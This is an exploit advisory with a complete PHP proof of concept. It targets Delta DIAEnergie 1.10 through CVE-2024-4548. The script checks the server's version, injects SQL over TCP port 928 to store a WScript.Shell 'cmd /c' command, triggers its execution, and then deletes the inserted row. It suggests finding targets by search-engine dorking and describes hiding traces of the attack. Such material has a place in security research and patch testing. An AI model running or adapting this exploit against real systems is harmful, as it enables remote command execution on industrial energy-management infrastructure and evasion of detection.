=============================================================================================================================================
| # Title     : DIAEnergie 1.10 PHP Code Injection Vulnerability                                                                            |
| # Author    : indoushka                                                                                                                   |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits)                                                            |
| # Vendor    : https://www.deltaww.com/en-US/products/DIAEnergie-Industrial-Energy-Management-System/ALL/                                  |
=============================================================================================================================================

POC :

[+] Dorking İn Google Or Other Search Enggine.

[+] Code Description:  The code attempts to establish a connection with the targeted server over the network.

    If the connection is successful, it sends a malicious SQL query to inject commands into the database.

    After injection, the script cleans the logs to ensure that the attack is not easily detected.
	
	( https://packetstorm.news/files/id/180334/  CVE-2024-4548 )
	
[+] save code as poc.php.

[+] Set Target : line 114

[+] USage : php poc.php 

[+] PayLoad :

<?php

class CustomSQLInjection
{
    const TARGET_PORT = 928;
    const TARGET_HOST = 'target_host'; // ضع عنوان الهدف هنا

    private $payload;

    public function __construct($cmd)
    {
        // تحديد الحمولة لتنفيذ الأوامر
        $this->payload = "CreateObject(\"WScript.Shell\").Run(\"cmd /c $cmd\")";
    }

    public function check()
    {
        try {
            $sock = $this->connect();
            fwrite($sock, 'Who is it?');
            $res = fread($sock, 1024);

            if (empty($res)) {
                echo "Received an empty response.\n";
                return 'Unknown';
            }

            echo "Who is it response: $res\n";

            preg_match('/\b\d+\.\d+\.\d+\.\d+\b/', $res, $version);

            if (empty($version)) {
                return 'Detected';
            }

            echo "Version retrieved: " . $version[0] . "\n";

            if (version_compare($version[0], '1.10.1.8610', '>')) {
                return 'Safe';
            }

            return 'Appears';

        } catch (Exception $e) {
            echo "Error: " . $e->getMessage() . "\n";
            return 'Unknown';
        }
    }

    public function exploit()
    {
        // حقن الحمولة
        $this->execute_command($this->payload);
    }

    private function execute_command($cmd)
    {
        $scname = bin2hex(random_bytes(rand(5, 10)));

        echo "Using random script name: $scname\n";

        $random_date = date('Y-m-d', rand(2024, 2026)) . '-' . sprintf('%02d', rand(1, 12)) . '-' . sprintf('%02d', rand(1, 29));
        echo "Using random date: $random_date\n";

        $random_time = sprintf('%02d:%02d:%02d', rand(0, 23), rand(0, 59), rand(0, 59));
        echo "Using random time: $random_time\n";

        try {
            echo "Sending SQL injection...\n";

            $sock = $this->connect();
            fwrite($sock, "RecalculateHDMWYC~$random_date $random_time~$random_date $random_time~1);INSERT INTO DIAEnergie.dbo.DIAE_script (name, script, kid, cm) VALUES(N'$scname', N'$cmd', N'', N'');--");
            $res = fread($sock, 1024);

            if ($res !== 'RecalculateHDMWYC Fail! The expression has too many closing parentheses.') {
                throw new Exception("Unexpected reply from the server: $res");
            }

            echo "Injection - Expected response received: $res\n";

            fclose($sock);

            // Trigger the script execution
            echo "Triggering script execution...\n";
            $sock = $this->connect();
            fwrite($sock, "RecalculateScript~$random_date $random_time~$random_date $random_time~1");
            $res = fread($sock, 1024);

            if ($res !== 'Recalculate Script Start!') {
                throw new Exception("Unexpected reply from the server: $res");
            }

            echo "Trigger - Expected response received: $res\n";

            fclose($sock);

            echo "Script successfully injected, check thy shell.\n";

        } catch (Exception $e) {
            echo "Error: " . $e->getMessage() . "\n";
            $this->cleanup($scname);
        }
    }

    private function cleanup($scname)
    {
        echo "Cleaning up database...\n";
        try {
            $sock = $this->connect();
            fwrite($sock, "RecalculateHDMWYC~2024-02-04 00:00:00~2024-02-05 00:00:00~1);DELETE FROM DIAEnergie.dbo.DIAE_script WHERE name='$scname';--");
            $res = fread($sock, 1024);

            if ($res !== 'RecalculateHDMWYC Fail! The expression has too many closing parentheses.') {
                throw new Exception("Unexpected reply from the server: $res");
            }

            echo "Cleanup - Expected response received: $res\n";
            fclose($sock);

        } catch (Exception $e) {
            echo "Error during cleanup: " . $e->getMessage() . "\n";
        }
    }

    private function connect()
    {
        // الاتصال باستخدام fsockopen
        $sock = fsockopen(self::TARGET_HOST, self::TARGET_PORT, $errno, $errstr, 10);
        if (!$sock) {
            throw new Exception("Connection failed: $errstr ($errno)");
        }
        return $sock;
    }
}

// تحديد الأمر الذي سيتم تنفيذه
$cmd = 'dir'; // استبدل هذا الأمر بالأمر الذي ترغب في تنفيذه
$exploit = new CustomSQLInjection($cmd);
$exploit->check();
$exploit->exploit();

?>

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================